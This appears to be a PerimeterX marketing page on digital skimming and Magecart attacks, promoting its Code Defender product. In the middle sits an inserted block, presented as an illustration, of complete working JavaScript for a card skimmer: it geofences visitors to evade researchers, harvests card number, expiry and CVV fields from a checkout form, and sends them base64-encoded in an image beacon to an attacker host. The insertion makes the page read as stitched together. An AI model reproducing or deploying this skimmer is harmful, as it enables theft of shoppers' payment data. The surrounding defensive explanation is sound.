Stop Digital Skimming And Magecart Attacks with PerimeterX

What Is Digital Skimming?

Digital skimming is a major cybersecurity threat to websites. Often called e-skimming or online card skimming, a digital skimming attack steals credit card or other payment card data from visitors to your online store. Retailers and banks have long dealt with physical skimming, where attackers attach stealthy skimmer devices to ATMs or point-of-sale terminals to capture credit and debit card numbers and PINs. Digital skimmers do the same thing on e-commerce websites: they skim payment data from the input fields of existing payment forms, or redirect unsuspecting users to fake checkout pages. Formjacking was the term originally used when attackers modified forms on web servers to collect PII, leading to data breaches.

How Does Digital Skimming Work?

Attackers take advantage of security weaknesses in a website's Shadow Code: the third-party JavaScript and open source libraries that the site owner did not write and does not control. Often they exploit vulnerabilities in third-party JavaScript, including zero-day flaws for which no patch yet exists, as an opening into websites and mobile applications. They may also take advantage of misconfigured permissions on Amazon S3 buckets and GitHub repositories, or induce insiders to give them access to website source code. Digital skimmers then inject malicious code into the third-party scripts on your website and steal credit card data from inside the user's browser. These attacks are also called website supply chain attacks, since the main threat comes from the third-, fourth- or fifth-party scripts and libraries the website loads.


Magecart: The Most High Profile Digital Skimming Attack

Magecart is a style of digital skimming attack on web and mobile applications and a major cybersecurity threat to e-commerce sites. Magecart attacks target websites and e-commerce platforms such as Magento to steal personal data, usually payment card data. In the British Airways attack, for example, Magecart attackers modified an existing JavaScript library on the site so that it skimmed customer payment information, unbeknownst to the users or to British Airways. Website operators have no visibility into what happens inside their users' browsers when their client-side code is changed, and users remain unaware because these attacks usually do not alter the visible functionality of the site.

Magecart hackers inject a 'skimmer', an unwanted piece of JavaScript, into checkout pages, or modify the paths to checkout pages so that victims are routed through a page the attackers control. To evade detection, Magecart attackers also obfuscate the skimmer code and geofence it, so that it only fires for visitors from the target country or region and stays dormant for researchers and the merchant's own staff elsewhere.

The injected code waits for users to fill out forms with their credit card numbers or other customer data. The information is transmitted directly from the user's browser or device to a site controlled by the attacker, so it never passes through the merchant's own servers and leaves no trace in their logs. Once they have stolen this data, cybercriminals are free to go shopping on the users' accounts or resell the card information on the dark web.
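The mechanics described above, reduced to a runnable example. This is added here for illustration; it is not PerimeterX code and not the code of any real skimmer. It shows the three moving parts, the geofence, the harvesting of card-like fields and the image-beacon exfiltration, as pure functions that run under Node, plus the browser hook that would wire them to a checkout form. The attacker host stats.example-cdn.invalid, the form#checkout selector and the sample field names and values are all constructed for this demonstration.

```javascript
// Added example, not PerimeterX code and not any real skimmer: the moving parts
// of a Magecart-style skimmer (geofence, harvest, exfiltrate) as pure functions
// so they run under Node with no browser. The attacker host, the form selector
// and the sample field values are constructed for this demonstration.

const C2_HOST = "stats.example-cdn.invalid"; // hypothetical attacker-controlled host

// Field names a skimmer keys on. Matching on names keeps the payload small;
// cruder skimmers simply serialize every input on the page.
const SENSITIVE = /card|cc|pan|number|cvv|cvc|csc|exp|holder|email|zip|postal/i;

// Geofence: arm the skimmer only for visitors in the target countries, so that
// researchers and the merchant's own staff elsewhere never see the beacon.
// `locale` is what navigator.language returns, e.g. "en-US".
function inTargetRegion(locale, targetCountries) {
  const m = /^[a-z]{2,3}-([a-z]{2})\b/i.exec(locale || "");
  return m !== null && targetCountries.includes(m[1].toUpperCase());
}

// Harvest: keep only the payment-looking fields from a serialized form.
// `fields` is an array of {name, value}, as FormData would yield in a browser.
function harvest(fields) {
  const stolen = {};
  for (const { name, value } of fields) {
    if (SENSITIVE.test(name) && value !== "") stolen[name] = value;
  }
  return stolen;
}

// Exfiltrate: JSON-encode the haul, base64 it and hang it off an image URL.
// Setting an Image's src issues a plain GET with no CORS preflight, and the
// request goes from the victim's browser straight to the attacker, so the
// merchant's servers never see it.
function buildBeacon(stolen, c2Host) {
  const payload = Buffer.from(JSON.stringify(stolen), "utf8").toString("base64");
  return `https://${c2Host}/pixel.gif?d=${encodeURIComponent(payload)}`;
}

// What the attacker's collector does with the beacon URL it receives.
function decodeBeacon(beaconUrl) {
  const d = new URL(beaconUrl).searchParams.get("d");
  return JSON.parse(Buffer.from(d, "base64").toString("utf8"));
}

// Browser glue: hook the checkout form's submit in the capture phase so the
// skimmer runs before the site's own handler, then let the submit continue.
// The page keeps working normally, which is why users notice nothing.
// Returns true when the hook was installed.
function install(doc, locale, targetCountries, c2Host) {
  if (!doc || !inTargetRegion(locale, targetCountries)) return false;
  const form = doc.querySelector("form#checkout");
  if (!form) return false;
  form.addEventListener("submit", () => {
    const fields = Array.from(form.elements, el => ({ name: el.name || "", value: el.value || "" }));
    const stolen = harvest(fields);
    if (Object.keys(stolen).length > 0) new Image().src = buildBeacon(stolen, c2Host);
  }, { capture: true });
  return true;
}

// Constructed sample of what a victim typed into the checkout form.
const SAMPLE_FORM = [
  { name: "cardholder_name", value: "A. Customer" },
  { name: "card_number", value: "4111111111111111" },
  { name: "exp", value: "12/27" },
  { name: "cvv", value: "123" },
  { name: "newsletter_optin", value: "yes" },
  { name: "csrf_token", value: "f3a9c1" },
];

// End-to-end run of the pure parts, usable from Node: returns what the
// attacker's collector would log for this victim.
function demo() {
  const stolen = harvest(SAMPLE_FORM);
  return decodeBeacon(buildBeacon(stolen, C2_HOST));
}

if (typeof document !== "undefined") {
  install(document, navigator.language, ["US", "GB"], C2_HOST);
}
```

Two things in this skeleton are what make skimmers hard to catch from the server side: the beacon is an ordinary image request from the victim's browser, so the merchant's web server and WAF never see it, and the geofence means a scanner run from the wrong country fetches a script that does nothing at all.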

Inside the Magecart Threat

A Growing Menace to E-commerce

As online shopping continues to grow, so do cybercrime and Magecart attacks. Within a 12-month period spanning 2017 and 2018, Magecart, a loosely organized set of criminal groups, breached more than 12 third-party software vendors, turning each breach into a supply chain attack on that vendor's customers. For today's e-commerce companies, digital skimming is the new normal. In 2019, the UK Information Commissioner's Office announced a proposed penalty of roughly $230 million (£183 million) against British Airways, all stemming from a Magecart attack in 2018.

For hackers, this type of attack brings in big profits with very little effort. In one reported case, the attack required nothing more than a single line of JavaScript that loaded a malicious script, which then carried out card skimming on thousands of websites.

The majority of digital skimming attacks target third-party content management systems and online shopping cart systems such as Magento. Merchants rely on them to make their e-commerce sites more seamless and user-friendly. But these third-party tools are under constant attack by digital skimmers looking to exploit their security vulnerabilities.

To avoid detection, attackers hide malicious code inside legitimate code. Merchants and customers may be unaware of the malware or the data breach for days, or in some cases months. As of October 2019, none of the cybercriminals responsible for Magecart attacks had been caught.


How Are Companies Fighting Digital Skimming and Magecart Attacks?

Traditional security controls like web application firewalls (WAFs) are not enough to protect the client side against digital skimming and Magecart attacks: a WAF inspects traffic between the browser and the site's own servers, while a skimmer runs inside the browser and sends stolen data straight to the attacker. Some companies bet on static scanning of their site, overlooking the dynamic nature of Magecart attacks, whose code changes over time and is often served only to selected visitors. Solutions like sandboxing create significant hurdles in the website development process and break continuous integration/continuous deployment cycles. Content security policies (CSP) are the first resort for many web application security professionals. CSP, originally designed to limit cross-site scripting (XSS), needs a lot of tuning, and a host-based allowlist on its own provides no protection against a compromise of a trusted domain, which can then be used to inject a skimmer into the website. A tight policy can at least limit where a skimmer is able to send data, but the broad third-party allowances common on e-commerce sites often leave that door open.

Modern client-side application security solutions continuously monitor the behavior of every script on your website, flag anomalies such as a script that starts reading payment fields or sending data to a domain it never contacted before, and automatically generate and maintain the CSP rules that stop digital skimming and Magecart attacks.


Stop Digital Skimming Attacks Like Magecart with PerimeterX Code Defender

PerimeterX Code Defender stops client-side data breaches on your website using behavioral analysis and content security policies (CSP). It gives you full visibility into, and control over, the scripts running on the client side, and identifies suspicious changes to them, preventing compromised JavaScript from skimming your users' data. Every user's execution of every script is monitored to detect and stop credit card skimming and other data exfiltration attempts.

PerimeterX Code Defender Prevents Client-side Attacks

By leveraging real-time, behavior-based analysis and machine-learning models, Code Defender delivers accurate detection of cybersecurity threats including digital skimming, Magecart attacks and PII harvesting. With deep knowledge of how attackers think and act, it protects your digital business from client-side data breaches and the latest generation of cyberattacks.

© PerimeterX, Inc. All rights reserved.